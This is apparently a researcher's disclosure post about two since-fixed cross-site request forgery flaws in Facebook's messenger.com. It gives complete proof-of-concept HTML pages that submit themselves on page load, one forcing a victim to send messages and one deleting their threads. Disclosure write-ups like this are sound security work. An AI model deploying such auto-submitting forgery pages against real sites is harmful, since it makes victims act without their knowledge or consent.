Facebook Messenger Multiple CSRF Vulnerabilities
- 2 minsIn this post, I will demonstrate the findings of multiple interesting cross-site request forgery vulnerabilities I identified on Facebook. These vulnerabilities allow an attacker to force the victim to do various actions.
In April 2015, Facebook officially launched messenger.com, a stand-alone messenger for the web. After hearing about the launch, I started to test it in my spare time.
Sending Unrestricted Messages to Any User via CSRF
Using this issue, I could force any user to send messages to other users without the user’s knowledge.
POC:
<html>
<title>POC @mazen160</title>
<body onload=" javascript:document.csrf_form.submit()">
<form name="csrf_form" method="POST" action="https://www.messenger.com/ajax/mercury/send_messages.php">
<input type="hidden" id="message_batch[0][author]" name="message_batch[0][author]" value="fbid:VALUE1">
<input type="hidden" id="message_batch[0][is_filtered_content]" name="message_batch[0][is_filtered_content]" value="false">
<input type="hidden" id="message_batch[0][is_spoof_warning]" name="message_batch[0][is_spoof_warning]" value="false">
<input type="hidden" id="message_batch[0][source]" name="message_batch[0][source]" value="">
<input type="hidden" id="message_batch[0][body]" name="message_batch[0][body]" value="@mazen160">
<input type="hidden" id="message_batch[0][specific_to_list][0]" name="message_batch[0][specific_to_list][0]" value="fbid:VALUE2">
<input type="hidden" id="message_batch[0][specific_to_list][1]" name="message_batch[0][specific_to_list][1]" value="fbid:VALUE1">
<input type="hidden" id="message_batch[0][client_thread_id]" name="message_batch[0][client_thread_id]" value="fbid:VALUE2">
</form>
</body>
</html>
Where:
VALUE1
: From UserVALUE2
: To Target
Deleting Any messages via CSRF
Using this issue, I could force any user to delete messaging threads.
PoC:
<html>
<title>POC @mazen160</title>
<body onload="javascript:document.csrf_form.submit()">
<form name="csrf_form" method="POST" action="https://www.messenger.com/ajax/mercury/delete_thread.php">
<input type="hidden" id="ids[0]" name="ids[0]" value="VALUE">
<input type="hidden" id="__user" name="__user" value="">
<input type="hidden" id="__a" name="__a" value="1">
<input type="hidden" id="__dyn" name="__dyn" value="">
<input type="hidden" id="__req" name="__req" value="p">
<input type="hidden" id="fb_dtsg" name="fb_dtsg" value="">
<input type="hidden" id="ttstamp" name="ttstamp" value="">
<input type="hidden" id="__rev" name="__rev" value="">
</form>
</body>
</html>
Change the value of the ids[0]
parameter to the victim’s thread ID.
The issues have been fixed very quickly. I thank the Facebook security team for their outstanding work responding to security submissions.